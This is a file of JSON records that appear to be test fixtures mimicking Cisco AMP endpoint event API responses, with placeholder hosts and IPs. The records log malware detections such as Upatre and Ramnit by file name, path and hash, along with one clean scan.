Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":824000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704197","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc"},"parent":{"process_id":2492,"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":793000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704196","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":684000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704195","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663803156595000,"timestamp":1610704832,"timestamp_nanoseconds":704000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663803156594701","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663803156595000,"timestamp":1610704832,"timestamp_nanoseconds":611000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663803156594700","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":3996,"disposition":"Malicious","file_name":"Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663803156595000,"timestamp":1610704832,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663803156594699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826707312705798000,"timestamp":1610704830,"timestamp_nanoseconds":659000000,"date":"2021-01-15T10:00:30+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1264,"scanned_processes":21,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899742001000,"timestamp":1610704828,"timestamp_nanoseconds":742000000,"date":"2021-01-15T10:00:28+00:00","event_type":"Microsoft Word compromise","event_type_id":1107296262,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610704828,"start_date":"2021-01-15T10:00:28+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CryptoWall","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"ce:32:02:72:9b:c8"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"caee8a2c599ad6e46ffdec5fabadc438af5c2ae5266d2c1e120269fffda6e426"},"parent":{"disposition":"Clean","identity":{"sha256":"b4234acf96fbe0e0feca317a1928afac05105b73556990d89f8a18563e1a3c65"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":589000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6180331452157132817","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":495000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132816","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":339000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132815","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":324000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331452157132814","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132813","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132812","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132811","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":246000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132810","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":168000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331452157132809","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":121000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331452157132808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":407000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758218","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qdcuuckk.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\iwkikcbw\\qdcuuckk.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c"},"parent":{"process_id":4028,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"2910ebc692d833d949bfd56059e8106d324a276d5f165f874f3fb1b6c613cdd5","sha1":"49083ae3725a0488e0a8fbbe1335c745f70c4667","md5":"27c6d03bcdb8cfeb96b716f3d8be3e18"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":345000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758217","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":298000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758216","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qdcuuckk.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Start Menu\\Programs\\Startup\\qdcuuckk.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":4028,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"2910ebc692d833d949bfd56059e8106d324a276d5f165f874f3fb1b6c613cdd5","sha1":"49083ae3725a0488e0a8fbbe1335c745f70c4667","md5":"27c6d03bcdb8cfeb96b716f3d8be3e18"}}}}} 